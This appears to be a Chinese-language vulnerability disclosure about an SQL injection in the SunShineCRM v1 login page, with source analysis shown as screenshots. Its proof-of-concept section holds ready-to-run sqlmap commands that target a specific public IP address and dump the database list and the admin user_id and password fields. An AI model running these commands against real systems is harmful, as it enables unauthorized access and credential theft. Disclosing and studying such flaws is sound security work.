VULHUB ™

<p>（0day）郑州单点科技软件有限公司开发的开源软件SunShineCRMv1版存在SQL注入漏洞</p><p>漏洞分析过程如下：</p><p>1、 源码分析：</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SunShineCRM系统登录页面index.php的POST表单action跳转到logincheck.php页面</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <img data-image-size="653,185" src="https://images.seebug.org/contribute/93a69b96-4ec9-4e71-aa11-f437d8bc80e3-Clipboard Image.png" alt="Clipboard Image.png" height="185" width="653"><br></p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Logincheck.php页面负责对登录的用户名和密码进行验证，虽然有校验特殊字符的代码，但却并 未过滤和转义这些特殊字符</p><p data-indent="1"><img data-image-size="598,218" src="https://images.seebug.org/contribute/8aac2153-ef2a-458e-9f27-be36b00a3e5f-Clipboard Image.png" alt="Clipboard Image.png"><br></p><p data-indent="1"><img data-image-size="626,287" src="https://images.seebug.org/contribute/8cc15618-5961-46e6-baed-24ab2954f1c5-Clipboard Image.png" alt="Clipboard Image.png"></p><p data-indent="1"><br></p><p data-indent="0">2、 POC过程：</p><p...

<p>（0day）郑州单点科技软件有限公司开发的开源软件SunShineCRMv1版存在SQL注入漏洞</p><p>漏洞分析过程如下：</p><p>1、 源码分析：</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SunShineCRM系统登录页面index.php的POST表单action跳转到logincheck.php页面</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <img data-image-size="653,185" src="https://images.seebug.org/contribute/93a69b96-4ec9-4e71-aa11-f437d8bc80e3-Clipboard Image.png" alt="Clipboard Image.png" height="185" width="653"><br></p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Logincheck.php页面负责对登录的用户名和密码进行验证，虽然有校验特殊字符的代码，但却并 未过滤和转义这些特殊字符</p><p data-indent="1"><img data-image-size="598,218" src="https://images.seebug.org/contribute/8aac2153-ef2a-458e-9f27-be36b00a3e5f-Clipboard Image.png" alt="Clipboard Image.png"><br></p><p data-indent="1"><img data-image-size="626,287" src="https://images.seebug.org/contribute/8cc15618-5961-46e6-baed-24ab2954f1c5-Clipboard Image.png" alt="Clipboard Image.png"></p><p data-indent="1"><br></p><p data-indent="0">2、 POC过程：</p><p data-indent="0">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 首先检测注入是否存在</p><p data-indent="0"><img data-image-size="820,317" src="https://images.seebug.org/contribute/44faaab3-34ff-4ece-94ef-22de8d4f12d9-Clipboard Image.png" alt="Clipboard Image.png"></p><p data-indent="0"><br></p><p data-indent="0">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 然后使用SQLMAP探测目标数据库信息，默认数据库(mysql)和CRM系统数据库(crm_market)<br></p><p data-indent="0">&nbsp; ``` sqlmap-u "http://103.49.92.42/crm/general/ERP/LOGIN/logincheck.php"--data="username=1111&password=2222&imageField.x=61&imageField.y=27"-p "username" --dbs ``` </p><p><img data-image-size="817,234" src="https://images.seebug.org/contribute/41a64448-5bdd-48de-bdd2-7a7d15f2e104-Clipboard Image.png" alt="Clipboard Image.png"></p><p><br></p><p>&nbsp;&nbsp; &nbsp; &nbsp; &nbsp; 探测crm_market数据库中的user_id和password字段（admin是本系统的登录管理员）</p><p>&nbsp;&nbsp;&nbsp; </p> ``` sqlmap-u "http://103.49.92.42/crm/general/ERP/LOGIN/logincheck.php"--data="username=1111&password=222&imageField.x=61&imageField.y=27"-p "username" -D crm_market -T user -C user_id,password --dump -v 3 ``` <br><p data-indent="1">&nbsp;&nbsp; <img data-image-size="483,179" src="https://images.seebug.org/contribute/6382b3e4-19b6-4709-9c50-90507490d6e0-Clipboard Image.png" alt="Clipboard Image.png"><br></p><p data-indent="0">&nbsp;&nbsp; <br></p><p data-indent="0">&nbsp; <br></p>